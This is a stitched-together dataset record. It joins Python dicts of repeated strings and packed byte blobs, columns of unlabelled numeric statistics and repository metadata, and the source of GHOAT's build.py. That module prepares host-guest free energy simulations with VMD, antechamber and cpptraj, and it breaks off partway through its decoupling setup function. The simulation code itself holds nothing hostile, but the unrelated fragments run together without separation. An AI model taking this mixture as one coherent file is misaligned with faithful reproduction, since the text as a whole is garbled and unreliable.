lowercase = {'val': 'abcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabc', 'packed': (48, 45, 3, b'\xfe:\x14F\x8b\xf8\x82\xf1\xb9\xb0\x12\x08\xba\x0fa\x9a\xd2\xe8\xba\xf5\xee\xc1\x1a\xe8\xbaj\x1f\xcf:\xe8\x82\xd9\xa8\xb0B\x08\xfe\xaa\xaa\xaa\xab\xf8\x00\x07x\x9a\xc8\x00\xfb\xdd\xff\xa5\x05P@b\x04O\x1d\xa8\xf6x/\xb0sP`\x1d\x11\x1a\xc9\xf8\xbe\xe5\xee\xa5\x02\x00\x98\x82\x04_\x9c(\xd2(/\xb0cpy\x05\x11\x1a\xc9\xe8f5\xee\xe7f\x00\xc0\xc2\x04_\x9c(\x1bX\xab\xb0cp\x81cP\x1a\xc9\xe8\x1f\xdd\xff\xe7o\x80\xe8\x9a\x08\xc6\x98\xa8\xda\xd8\xaa\xb0z\x90(\xb3H\x9a\xc8\xf0\xef\xbd\xef\xc1?\x80T\xca\x1e\xc6\x8e(\xb7\x99\xac0l\x90\xb5\x0fc\x9a\xd3pO%\xe0A!\x80\xc8\xda\x1e\xcf\x0c(\x8e\x99\xac0l\xd0\xe1\x0fq\x9a\xd3x\x96\xa9\xe1\xa5\x01\x80y\x10\x1e\xcf\x1c(\n@,0m\xd0yu\x11\x9a\xd3h\x9be\xef\xa5\x0f\x90\x00\xda\x08\xdf\x98\xa8\xfe\xb6:\xb0z\xf0\x82\x0b\x18\x9a\xc8\xe8\xba\x9f\xef\xe7o\x80\xba\xc8\t\xdf\x81\xb0\xba\xf8\xa6\xb0zh\x82\xcbL\x1a\xc5\xe0\xfe\xa5\xf7\xe7k\x10\x00\x00\x00\xff\xbc\xec\xfe\x7f\x00\x00O\xe2\t\x03\x01\x00\x00\x00')}
uppercase = {'val': 'ABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABC', 'packed': (40, 37, 3, b'\xfe\xba3\x03\xf8\x82m\x9bR\x08\xba(<\xba\xe8\xba\x0c\xc12\xe8\xbaS\x85R\xe8\x82/\x90:\x08\xfe\xaa\xaa\xab\xf8\x00\xb2\xf5 \x00\xdaq\x8d\xea\x08\xe5\x92j\x9b\x80\xcb\xdf\x92\x0b\xe8@0m\x8f\xb0\x9eh\x80\xc1\xc0\xf8\xa6\xe4\xb2H\xf3\x08e\xf6P\xe4D\xaf\xbc J\x14\xb2I\xa0]rc\xf5\xc0b\xc8\x08\x00\x08l\x87\xbd\xa2H\xdb\xb2\xe2uP\xa9\x08\xdb\xf8h\xaaf\x90[\xa852\xc2\x0c\xb8\xbbd\x80\x15\x88\x944(\xa9X\xdf|\xda\x13\xb0\x80\xe9\x9d\xb8(\xa7\xa6\xb3\x7f\x80\x00\xba\xd9\x98\xa8\xfeNA\n\x98\x82i\x18x\x90\xba\xdb8\x1f\xa0\xba\xfd\x99\xc7\xc8\xbaF\xa1D(\x82\x9b@7\x90\xfe\xe2u\x81\x98-\xc0\x05\xdd\x7f\x00\x00\x00\xff\xbc\xec\xfe\x7f\x00\x00')}
byte_upper = {'val': 'ABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABCABC', 'packed': (48, 45, 3, b'\xfe\xa84\xc6\x8b\xf8\x82\x1a\xd4$\xd2\x08\xba\x9a\xd7I\x12\xe8\xba\x85d\xc1\x1a\xe8\xba\xf3_\xf9\xba\xe8\x82d\x18\xc9\x02\x08\xfe\xaa\xaa\xaa\xab\xf8\x00\x14\x18\xa4\x90\x00\xf2\x88\xcf\xfed\xe8aH$\xcf\x1d\xa0\xe2\x83J$\x8a8\xac\xa8\xa7\xc9$\xc8\xff\xb5l\xa5\n \xc8kIiGH\xb6\xdd\x91I,\xc0\xf9u\x11\x12Ihg\xd6\x01Q\xb5HP\x1d\x92\x04\xf1\x90\x1eh\xa3\x92Ap,\xd0=\xa4\x92\x00_\x98\xcf\xbc\x0f\x90\xa8\xe0(\xc6\x88\xa0z\x93\xca\xa4\x8a\xf8\x98\x96\xf8\xc9(\xc0\x7f\xfdo\xc1?\xa0QSApUH?t\x1aI! \x05\x8fc\x92Ap\x0f\xb6\r\xf7\xfaH\x1c5\x9a\x14a\x90\x8a\xb9\xac\x92L\xd0\x15\xb4\x1c$\x9a\x10;D\xd7~l\x90\x99\x10,\xcf\x1c \n{A$\x96\xb8y\x18\xa7I,\xd8\x9b\ro\xa5\x0f\xb0\x00\xa3H\xe9H\xc8\xfe{\x9a\xc9:\xc0\x82k\x18\x92H\xe8\xbaD\x0f\xd1\xbf\xc8\xba\x85\x9f\x04\xe4\x80\xba\xb8\xa4\x92Zh\x82\xd0)$\x9e\x88\xfe\xc0\xc1<\x04\x80\x00\x00\x00\xff\xbc\xec\xfe\x7f\x00\x00O\xe2\t\x03\x01\x00\x00\x00')}
numeric = {'val': '123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123', 'packed': (40, 33, 7, b'\xfeJ\xaa\xbf\x80\x82=U \x80\xba\xea\xaa\xae\x80\xbauQ.\x80\xba"\xac\xae\x80\x82DU \x80\xfe\xaa\xaa\xbf\x80\x00\xe9S\x00\x00\xef\xb2\xa8\xe2\x00`5UJ\x00\xbf\xc2\xaa\xe0\x80\x10\x11U*\x80\n\n\xaa\x9a\x00Q\x9cU0\x80\xd2\xfa\xaa5\x80\x05\xadT\x1f\x00?\xd2\xabU\x00\xf0\xb1T\xe5\x80\xa3d\xaa\xcf\x00\xe9QU\xca\x00\xcb\xa8\xeb\xe0\x80]\xdd\\\xaa\x80\xa2z\x97\x1a\x00u/M0\x80\xa6\x92\x96\xfd\x80\x00\xd3R\x8f\x00\xfe\x845\xac\x00\x82\xf1K\x8c\x00\xba\xc8\x97\xff\x80\xba]@\xcb\x80\xba\xfa\xa5\xe0\x80\x82\x8fG*\x00\xfe\xb2\xb7\x1a\x80\x7f\x00\x00\x96\x00\x00\x00\x00\x00\x00\x00B\x00\x00\x00!\x00\x00\x00 1\xc0\x05\xdd\x7f\x00\x00\x00\xff\xbc\xec\xfe\x7f\x00\x00')}
| 782.6
| 1,134
| 0.768209
| 764
| 3,913
| 3.92801
| 0.356021
| 0.051983
| 0.041986
| 0.023992
| 0.206265
| 0.201266
| 0.18927
| 0.18927
| 0.061313
| 0.061313
| 0
| 0.251745
| 0.011245
| 3,913
| 4
| 1,135
| 978.25
| 0.523908
| 0
| 0
| 0
| 0
| 1
| 0.9563
| 0.945055
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b911fde6463632343607243bc23a5e5cda551817
| 50,009
|
py
|
Python
|
GHOAT/lib/build.py
|
GHeinzelmann/GHOAT.py
|
77f20073288cbad57a987d990e1a49eb4873ca99
|
[
"MIT"
] | 2
|
2021-03-17T14:08:32.000Z
|
2021-08-31T11:49:16.000Z
|
GHOAT/lib/build.py
|
GHeinzelmann/GHOAT.py
|
77f20073288cbad57a987d990e1a49eb4873ca99
|
[
"MIT"
] | 2
|
2021-03-18T17:01:34.000Z
|
2021-04-29T01:16:39.000Z
|
GHOAT/lib/build.py
|
GHeinzelmann/GHOAT.py
|
77f20073288cbad57a987d990e1a49eb4873ca99
|
[
"MIT"
] | 4
|
2021-05-30T08:28:02.000Z
|
2022-03-26T11:45:08.000Z
|
#!/usr/bin/env python3
import datetime as dt
import glob as glob
import os as os
import re as re
import shutil as shutil
import signal as signal
import subprocess as sp
import sys as sys
from lib import scripts
def build_equil(guest, host, mol, H1, H2, H3, min_adis, max_adis, l1_range, amber_ff, final_host_num, guest_charge, sdr_dist):
    """Set up the equilibration system for a host-guest complex.

    Creates the ./equil directory tree, separates host and guest from the
    input structure with VMD, generates force-field parameters (antechamber /
    parmchk2 for GAFF/GAFF2), locates the ligand anchor atoms, and writes the
    initial build.pdb for the simulation directory.

    Parameters mirror the GHOAT input: H1-H3 are receptor anchor masks of the
    form ':<resid>@<atom>'; min_adis/max_adis/l1_range control the anchor
    search; amber_ff is 'gaff' or 'gaff2'; guest_charge is the net charge
    passed to antechamber; sdr_dist is the SDR translation distance.

    Returns:
        'all'   on success,
        'anch1' if the anchor file is empty (no anchors found),
        'anch2' if an anchor line is incomplete (< 3 entries).

    Side effects: changes the working directory, runs external programs
    (vmd, antechamber, parmchk2), and creates/overwrites many files.
    """
    # Create equilibrium directory
    if not os.path.exists('equil'):
        os.makedirs('equil')
    os.chdir('equil')
    if os.path.exists('./build_files'):
        shutil.rmtree('./build_files')
    try:
        shutil.copytree('../build_files', './build_files')
    # Directories are the same
    except shutil.Error as e:
        print('Directory not copied. Error: %s' % e)
    # Any error saying that the directory doesn't exist
    except OSError as e:
        print('Directory not copied. Error: %s' % e)
    os.chdir('build_files')
    # Copy structure and separate guest and host
    shutil.copy('../../structures/%s-%s.pdb' % (host.lower(), guest.lower()), './')
    with open("separate-ini.tcl", "rt") as fin:
        with open("separate.tcl", "wt") as fout:
            for line in fin:
                fout.write(line.replace('MMM', mol).replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('FIRST','1').replace('LAST', str(final_host_num)))
    sp.call('vmd -dispdev text -e separate.tcl', shell=True)
    # Anchor masks look like ':<resid>@<atom>'; strip the leading ':'.
    h1_resid = H1.split('@')[0][1:]
    h2_resid = H2.split('@')[0][1:]
    h3_resid = H3.split('@')[0][1:]
    h1_atom = H1.split('@')[1]
    h2_atom = H2.split('@')[1]
    h3_atom = H3.split('@')[1]
    print('Receptor anchors:')
    print(H1)
    print(H2)
    print(H3)
    # Replace names in initial files and VMD scripts
    with open("prep-ini.tcl", "rt") as fin:
        with open("prep.tcl", "wt") as fout:
            for line in fin:
                fout.write(line.replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('MMM', mol).replace('NN1', h1_atom).replace('H1A', h1_resid).replace('NN2', h2_atom).replace('H2A', h2_resid).replace('NN3', h3_atom).replace('H3A', h3_resid).replace('FIRST','1').replace('LAST', str(final_host_num)).replace('STAGE','equil').replace('DMAX','%4.2f' %max_adis).replace('DMIN','%4.2f' %min_adis).replace('RANG','%4.2f' %l1_range).replace('SDRD', str(sdr_dist)))
    # Get parameters for host
    shutil.copy('../../parameters/%s.mol2' %(host.lower()), './') # AM1-BCC charges problematic for cyclic hosts, using provided charges only
    if not os.path.exists('../../parameters/%s.frcmod' %host.lower()):
        if amber_ff == 'gaff':
            sp.call('parmchk2 -i '+host.lower()+'.mol2 -f mol2 -o '+host.lower()+'.frcmod -s 1', shell=True)
        elif amber_ff == 'gaff2':
            sp.call('parmchk2 -i '+host.lower()+'.mol2 -f mol2 -o '+host.lower()+'.frcmod -s 2', shell=True)
    else:
        shutil.copy('../../parameters/%s.frcmod' %(host.lower()), './')
    # Get parameters for guest
    if not os.path.exists('../../parameters/%s.mol2' %guest.lower()):
        print('Antechamber parameters command: antechamber -i '+guest.lower()+'.pdb -fi pdb -o '+guest.lower()+'.mol2 -fo mol2 -c bcc -s 2 -at '+amber_ff.lower()+' -nc %s' % guest_charge)
        sp.call('antechamber -i '+guest.lower()+'.pdb -fi pdb -o '+guest.lower()+'.mol2 -fo mol2 -c bcc -s 2 -at '+amber_ff.lower()+' -nc %s' % guest_charge, shell=True)
    else:
        shutil.copy('../../parameters/%s.mol2' %(guest.lower()), './') # Provided charges for guest
    if not os.path.exists('../../parameters/%s.frcmod' %guest.lower()):
        if amber_ff == 'gaff':
            sp.call('parmchk2 -i '+guest.lower()+'.mol2 -f mol2 -o '+guest.lower()+'.frcmod -s 1', shell=True)
        elif amber_ff == 'gaff2':
            sp.call('parmchk2 -i '+guest.lower()+'.mol2 -f mol2 -o '+guest.lower()+'.frcmod -s 2', shell=True)
    else:
        shutil.copy('../../parameters/%s.frcmod' %(guest.lower()), './')
    # Put complex in AMBER format and find ligand anchor atoms
    sp.call('vmd -dispdev text -e prep.tcl', shell=True)
    # Save parameters in ff folder
    if not os.path.exists('../ff/'):
        os.makedirs('../ff/')
    shutil.copy('./%s.mol2' %(host.lower()), '../ff/')
    shutil.copy('./%s.frcmod' %(host.lower()), '../ff/')
    shutil.copy('./%s.mol2' %(guest.lower()), '../ff/')
    shutil.copy('./%s.frcmod' %(guest.lower()), '../ff/')
    # Check size of anchor file
    anchor_file = 'anchors.txt'
    if os.stat(anchor_file).st_size == 0:
        os.chdir('../')
        return 'anch1'
    # FIX: read the anchor file inside a context manager so the handle is
    # closed on every path (the original left it open, leaking on both the
    # early-return and success paths).
    bad_anchors = False
    with open(anchor_file, 'r') as f:
        for line in f:
            if len(line.split()) < 3:
                bad_anchors = True
                break
    # Archive the anchor file under the guest's name in either case.
    os.rename('./anchors.txt', 'anchors-'+guest.lower()+'.txt')
    os.chdir('../')
    if bad_anchors:
        return 'anch2'
    # Create simulation directory
    if not os.path.exists(guest):
        os.makedirs(guest)
    os.chdir(guest)
    shutil.copy('../build_files/%s-%s-aligned.pdb' %(host.lower(), guest.lower()), './build-ini.pdb')
    shutil.copy('../build_files/%s.pdb' %(guest.lower()), './')
    shutil.copy('../build_files/%s.pdb' %(host.lower()), './')
    shutil.copy('../build_files/anchors-%s.txt' %(guest.lower()), './')
    shutil.copy('../build_files/dum1.pdb', './')
    shutil.copy('../build_files/dum.mol2', './')
    shutil.copy('../build_files/dum.frcmod', './')
    dum_coords = []
    recep_coords = []
    lig_coords = []
    dum_atomlist = []
    lig_atomlist = []
    recep_atomlist = []
    dum_atom = 0
    lig_atom = 0
    recep_atom = 0
    total_atom = 0
    resid_lig = 0
    resname_lig = mol
    resname_list = []
    resid_list = []
    # Read coordinates for dummy atoms (dum1.pdb; copied again here as in the
    # original flow — harmless duplication of the copy above).
    for i in range(1, 2):
        shutil.copy('../build_files/dum'+str(i)+'.pdb', './')
        with open('dum'+str(i)+'.pdb') as dum_in:
            lines = (line.rstrip() for line in dum_in)
            lines = list(line for line in lines if line)
            # PDB fixed columns: x/y/z at 30:38/38:46/46:54, name at 12:16,
            # resname at 17:20, resid at 22:26.
            dum_coords.append((float(lines[1][30:38].strip()), float(lines[1][38:46].strip()), float(lines[1][46:54].strip())))
            dum_atomlist.append(lines[1][12:16].strip())
            resname_list.append(lines[1][17:20].strip())
            resid_list.append(float(lines[1][22:26].strip()))
        dum_atom += 1
        total_atom += 1
    # Read coordinates from aligned system
    with open('build-ini.pdb') as f_in:
        lines = (line.rstrip() for line in f_in)
        lines = list(line for line in lines if line) # Non-blank lines in a list
    # Count atoms of receptor and ligand
    for i in range(0, len(lines)):
        if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
            if (lines[i][17:20].strip() != mol) and (lines[i][17:20].strip() != 'DUM'):
                recep_coords.append((float(lines[i][30:38].strip()), float(lines[i][38:46].strip()), float(lines[i][46:54].strip())))
                recep_atomlist.append(lines[i][12:16].strip())
                resname_list.append(lines[i][17:20].strip())
                resid_list.append(float(lines[i][22:26].strip()) + dum_atom)
                recep_last = int(lines[i][22:26].strip())
                recep_atom += 1
                total_atom += 1
            elif lines[i][17:20].strip() == mol:
                lig_coords.append((float(lines[i][30:38].strip()), float(lines[i][38:46].strip()), float(lines[i][46:54].strip())))
                lig_atomlist.append(lines[i][12:16].strip())
                resname_list.append(lines[i][17:20].strip())
                resid_list.append(float(lines[i][22:26].strip()) + dum_atom)
                lig_atom += 1
                total_atom += 1
    # Merge segments: dummy atoms first, then receptor, then ligand.
    coords = dum_coords + recep_coords + lig_coords
    atom_namelist = dum_atomlist + recep_atomlist + lig_atomlist
    # NOTE(review): recep_last is unbound if no receptor atoms were found —
    # presumably guaranteed by the upstream VMD alignment; confirm.
    lig_resid = recep_last + dum_atom + 1
    # Write the new pdb file (context manager ensures it is flushed/closed).
    with open('build.pdb', 'w') as build_file:
        # Positions for the dummy atoms
        for i in range(0, 1):
            build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i], resname_list[i], resid_list[i]))
            build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]), float(coords[i][2])))
            build_file.write('%6.2f%6.2f\n'%(0, 0))
        build_file.write('TER\n')
        # Positions of the receptor atoms
        for i in range(dum_atom, dum_atom + recep_atom):
            build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i], resname_list[i], resid_list[i]))
            build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]), float(coords[i][2])))
            build_file.write('%6.2f%6.2f\n'%(0, 0))
        build_file.write('TER\n')
        # Positions of the ligand atoms (all share the single ligand resid)
        for i in range(dum_atom + recep_atom, total_atom):
            build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i], mol, float(lig_resid)))
            build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]), float(coords[i][2])))
            build_file.write('%6.2f%6.2f\n'%(0, 0))
        build_file.write('TER\n')
        build_file.write('END\n')
    os.chdir('../')
    return 'all'
def build_rest(fwin, min_adis, max_adis, l1_range, H1, H2, H3, hmr, hmol, mol, host, guest, final_host_num, comp, win, ntpr, ntwr, ntwe, ntwx, cut, gamma_ln, barostat, amber_ff, dt, sdr_dist):
  """Set up one window of a restraint component (comp 'a'/'l'/'t'/'c'/'r').

  Finds the receptor anchors with VMD, pulls force-field files and the final
  equilibration snapshot, fills in the tcl/MD-input templates, and populates
  the per-window directory under ../rest/.  Window 0 builds everything from
  scratch; later windows copy from the component's 00 window.

  Returns:
    'anch1' if the anchor file is empty, 'anch2' if an anchor line has fewer
    than three fields, 'all' on success.
  """
  # Get files or finding new anchors and building some systems
  if not os.path.exists('../build_files'):
    try:
      shutil.copytree('../../../build_files', '../build_files')
    # Directories are the same
    except shutil.Error as e:
      print('Directory not copied. Error: %s' % e)
    # Any error saying that the directory doesn't exist
    except OSError as e:
      print('Directory not copied. Error: %s' % e)
  os.chdir('../build_files')
  # Replace names in initial files and VMD scripts
  # Anchors come in as e.g. ':12@C3' -> residue id '12', atom name 'C3'
  h1_resid = H1.split('@')[0][1:]
  h2_resid = H2.split('@')[0][1:]
  h3_resid = H3.split('@')[0][1:]
  h1_atom = H1.split('@')[1]
  h2_atom = H2.split('@')[1]
  h3_atom = H3.split('@')[1]
  print('Receptor anchors:')
  print(H1)
  print(H2)
  print(H3)
  # Fill the VMD template placeholders (resids are shifted by +1, presumably
  # to account for a leading dummy residue -- TODO confirm against the tcl files)
  with open("prep-ini.tcl", "rt") as fin:
    with open("prep.tcl", "wt") as fout:
      for line in fin:
        fout.write(line.replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('MMM', mol).replace('NN1', h1_atom).replace('H1A', str(int(h1_resid)+1)).replace('NN2', h2_atom).replace('H2A', str(int(h2_resid)+1)).replace('NN3', h3_atom).replace('H3A', str(int(h3_resid)+1)).replace('FIRST','2').replace('LAST', str(int(final_host_num)+1)).replace('STAGE','equil').replace('DMAX','%4.2f' %max_adis).replace('DMIN','%4.2f' %min_adis).replace('RANG','%4.2f' %l1_range).replace('SDRD', str(sdr_dist)))
  with open("separate-ini.tcl", "rt") as fin:
    with open("separate.tcl", "wt") as fout:
      for line in fin:
        fout.write(line.replace('MMM', mol).replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('FIRST','2').replace('LAST', str(int(final_host_num)+1)))
  # Get parameters from equilibrium
  if not os.path.exists('../ff'):
    os.makedirs('../ff')
  shutil.copy('../../../equil/ff/%s.mol2' %(guest.lower()), '../ff/')
  shutil.copy('../../../equil/ff/%s.frcmod' %(guest.lower()), '../ff/')
  shutil.copy('../../../equil/ff/%s.mol2' %(host.lower()), '../ff/')
  shutil.copy('../../../equil/ff/%s.frcmod' %(host.lower()), '../ff/')
  # Get parameter file and final state from equilibrium
  for file in glob.glob('../../../equil/%s/full*.prmtop' %guest.lower()):
    shutil.copy(file, './')
  for file in glob.glob('../../../equil/%s/vac*' %guest.lower()):
    shutil.copy(file, './')
  shutil.copy('../../../equil/%s/md%02d.rst7' %(guest.lower(), fwin), './')
  # Convert the chosen equilibration frame to PDB, then run the VMD scripts
  # (separate.tcl splits the complex; prep.tcl finds the anchors)
  sp.call('cpptraj -p full.prmtop -y md%02d.rst7 -x %s-%s.pdb > cpptraj.log' %(fwin, host.lower(), guest.lower()), shell=True)
  sp.call('vmd -dispdev text -e separate.tcl', shell=True)
  sp.call('vmd -dispdev text -e prep.tcl', shell=True)
  os.rename('./anchors.txt', 'anchors-'+guest.lower()+'.txt')
  os.chdir('../rest/')
  # Check size of anchor file
  anchor_file = '../build_files/anchors-'+guest.lower()+'.txt'
  if os.stat(anchor_file).st_size == 0:
    return 'anch1'
  f = open(anchor_file, 'r')
  for line in f:
    splitdata = line.split()
    if len(splitdata) < 3:
      return 'anch2'
  # Copy and replace simulation files for the first window
  if int(win) == 0:
    if os.path.exists('amber_files'):
      shutil.rmtree('./amber_files')
    try:
      shutil.copytree('../../../amber_files', './amber_files')
    # Directories are the same
    except shutil.Error as e:
      print('Directory not copied. Error: %s' % e)
    # Any error saying that the directory doesn't exist
    except OSError as e:
      print('Directory not copied. Error: %s' % e)
    # Substitute the user's MD parameters into every copied input template
    for dname, dirs, files in os.walk('./amber_files'):
      for fname in files:
        fpath = os.path.join(dname, fname)
        with open(fpath) as f:
          s = f.read()
          s = s.replace('_step_', dt).replace('_ntpr_', ntpr).replace('_ntwr_', ntwr).replace('_ntwe_', ntwe).replace('_ntwx_', ntwx).replace('_cutoff_', cut).replace('_gamma_ln_', gamma_ln).replace('_barostat_', barostat).replace('_amber_ff_', amber_ff)
        with open(fpath, "w") as f:
          f.write(s)
    if not os.path.exists('run_files'):
      try:
        shutil.copytree('../../../run_files', './run_files')
      # Directories are the same
      except shutil.Error as e:
        print('Directory not copied. Error: %s' % e)
      # Any error saying that the directory doesn't exist
      except OSError as e:
        print('Directory not copied. Error: %s' % e)
    # Point the run scripts at the regular or mass-repartitioned topology
    if hmr == 'no':
      replacement = 'full.prmtop'
      for dname, dirs, files in os.walk('./run_files'):
        for fname in files:
          fpath = os.path.join(dname, fname)
          with open(fpath) as f:
            s = f.read()
            s = s.replace('full.hmr.prmtop', replacement)
          with open(fpath, "w") as f:
            f.write(s)
    elif hmr == 'yes':
      replacement = 'full.hmr.prmtop'
      for dname, dirs, files in os.walk('./run_files'):
        for fname in files:
          fpath = os.path.join(dname, fname)
          with open(fpath) as f:
            s = f.read()
            s = s.replace('full.prmtop', replacement)
          with open(fpath, "w") as f:
            f.write(s)
  if (comp == 'a' or comp == 'l' or comp == 't'):
    # Create window directory
    if not os.path.exists('%s%02d' %(comp, int(win))):
      os.makedirs('%s%02d' %(comp, int(win)))
    os.chdir('%s%02d' %(comp, int(win)))
    # Copy a few files and define new reference state
    if int(win) == 0:
      for file in glob.glob('../../build_files/full*.prmtop'):
        shutil.copy(file, './')
      for file in glob.glob('../../build_files/vac*'):
        shutil.copy(file, './')
      shutil.copy('../../build_files/md%02d.rst7' %fwin, './md00.rst7')
      # NOTE(review): filename uses 'guest' while the file was saved above as
      # guest.lower() -- only correct if guest is already lowercase; confirm.
      shutil.copy('../../build_files/anchors-'+guest+'.txt', './')
      for file in glob.glob('../../ff/*.mol2'):
        shutil.copy(file, './')
      sp.call('cpptraj -p full.prmtop -y md00.rst7 -x full.rst7 > cpptraj1.log', shell=True)
      shutil.copy('./full.rst7', './full.inpcrd')
      sp.call('cpptraj -p full.prmtop -y md00.rst7 -x full.pdb > cpptraj2.log', shell=True)
    else:
      for file in glob.glob('../%s00/*' %comp):
        shutil.copy(file, './')
  elif comp == 'c':
    # Copy files to c00 to create new box for ligand and copy to the different windows
    if not os.path.exists('%s%02d' %(comp, int(win))):
      os.makedirs('%s%02d' %(comp, int(win)))
    os.chdir('%s%02d' %(comp, int(win)))
    if int(win) == 0:
      shutil.copy('../../build_files/'+guest+'.pdb', './')
      shutil.copy('../../build_files/'+host+'-'+guest+'.pdb', './')
      shutil.copy('../../build_files/anchors-'+guest+'.txt', './')
    else:
      for file in glob.glob('../c00/*'):
        shutil.copy(file, './')
  elif comp == 'r':
    # Copy files to r00 to create new box for host and copy to the different windows
    if not os.path.exists('%s%02d' %(comp, int(win))):
      os.makedirs('%s%02d' %(comp, int(win)))
    os.chdir('%s%02d' %(comp, int(win)))
    if int(win) == 0:
      # Get files and parameters for building
      shutil.copy('../../build_files/'+guest+'.pdb', './')
      shutil.copy('../../build_files/'+host+'.pdb', './')
      shutil.copy('../../build_files/vac_host.prmtop', './')
      shutil.copy('../../build_files/vac_host.pdb', './')
      shutil.copy('../../build_files/'+host+'-aligned.pdb', './build.pdb')
      shutil.copy('../../build_files/'+host+'-'+guest+'.pdb', './')
      shutil.copy('../../build_files/anchors-'+guest+'.txt', './')
      shutil.copy('../../build_files/dum.mol2', './')
      shutil.copy('../../build_files/dum.frcmod', './')
      for file in glob.glob('../../ff/*.frcmod'):
        shutil.copy(file, './')
      for file in glob.glob('../../ff/*.mol2'):
        shutil.copy(file, './')
    else:
      for file in glob.glob('../r00/*'):
        shutil.copy(file, './')
  return 'all'
def build_dec(fwin, min_adis, max_adis, l1_range, H1, H2, H3, hmr, hmol, mol, host, guest, final_host_num, comp, win, ntpr, ntwr, ntwe, ntwx, cut, gamma_ln, barostat, amber_ff, dt, sdr_dist):
  """Set up one window of a decoupling component under ../sdr/.

  Mirrors build_rest for the anchor search and file staging, then (for window
  0) assembles build.pdb from two dummy atoms, the receptor, the bound guest,
  and extra guest copies: three extra copies for comp 'e' (decharging), one
  copy shifted by sdr_dist along z otherwise (vdW decoupling).

  Returns:
    'anch1' if the anchor file is empty, 'anch2' if an anchor line has fewer
    than three fields, 'all' on success.
  """
  # Get files or finding new anchors and building some systems
  if not os.path.exists('../build_files'):
    try:
      shutil.copytree('../../../build_files', '../build_files')
    # Directories are the same
    except shutil.Error as e:
      print('Directory not copied. Error: %s' % e)
    # Any error saying that the directory doesn't exist
    except OSError as e:
      print('Directory not copied. Error: %s' % e)
  os.chdir('../build_files')
  # Replace names in initial files and VMD scripts
  # Anchors come in as e.g. ':12@C3' -> residue id '12', atom name 'C3'
  h1_resid = H1.split('@')[0][1:]
  h2_resid = H2.split('@')[0][1:]
  h3_resid = H3.split('@')[0][1:]
  h1_atom = H1.split('@')[1]
  h2_atom = H2.split('@')[1]
  h3_atom = H3.split('@')[1]
  print('Receptor anchors:')
  print(H1)
  print(H2)
  print(H3)
  with open("prep-ini.tcl", "rt") as fin:
    with open("prep.tcl", "wt") as fout:
      for line in fin:
        fout.write(line.replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('MMM', mol).replace('NN1', h1_atom).replace('H1A', str(int(h1_resid)+1)).replace('NN2', h2_atom).replace('H2A', str(int(h2_resid)+1)).replace('NN3', h3_atom).replace('H3A', str(int(h3_resid)+1)).replace('FIRST','2').replace('LAST', str(int(final_host_num)+1)).replace('STAGE','equil').replace('DMAX','%4.2f' %max_adis).replace('DMIN','%4.2f' %min_adis).replace('RANG','%4.2f' %l1_range).replace('SDRD', str(sdr_dist)))
  with open("separate-ini.tcl", "rt") as fin:
    with open("separate.tcl", "wt") as fout:
      for line in fin:
        fout.write(line.replace('MMM', mol).replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('FIRST','2').replace('LAST', str(int(final_host_num)+1)))
  # Get parameters from equilibrium
  if not os.path.exists('../ff'):
    os.makedirs('../ff')
  shutil.copy('../../../equil/ff/%s.mol2' %(guest.lower()), '../ff/')
  shutil.copy('../../../equil/ff/%s.frcmod' %(guest.lower()), '../ff/')
  shutil.copy('../../../equil/ff/%s.mol2' %(host.lower()), '../ff/')
  shutil.copy('../../../equil/ff/%s.frcmod' %(host.lower()), '../ff/')
  # Get parameter file and final state from equilibrium
  for file in glob.glob('../../../equil/%s/full*.prmtop' %guest.lower()):
    shutil.copy(file, './')
  for file in glob.glob('../../../equil/%s/vac*' %guest.lower()):
    shutil.copy(file, './')
  shutil.copy('../../../equil/%s/md%02d.rst7' %(guest.lower(), fwin), './')
  # Convert the chosen equilibration frame to PDB, then run the VMD scripts
  sp.call('cpptraj -p full.prmtop -y md%02d.rst7 -x %s-%s.pdb > cpptraj.log' %(fwin, host.lower(), guest.lower()), shell=True)
  sp.call('vmd -dispdev text -e separate.tcl', shell=True)
  sp.call('vmd -dispdev text -e prep.tcl', shell=True)
  os.rename('./anchors.txt', 'anchors-'+guest.lower()+'.txt')
  os.chdir('../sdr/')
  # Check size of anchor file
  anchor_file = '../build_files/anchors-'+guest.lower()+'.txt'
  if os.stat(anchor_file).st_size == 0:
    return 'anch1'
  f = open(anchor_file, 'r')
  for line in f:
    splitdata = line.split()
    if len(splitdata) < 3:
      return 'anch2'
  # Copy and replace simulation files for the first window
  if int(win) == 0:
    if os.path.exists('./amber_files'):
      shutil.rmtree('./amber_files')
    try:
      shutil.copytree('../../../amber_files', './amber_files')
    # Directories are the same
    except shutil.Error as e:
      print('Directory not copied. Error: %s' % e)
    # Any error saying that the directory doesn't exist
    except OSError as e:
      print('Directory not copied. Error: %s' % e)
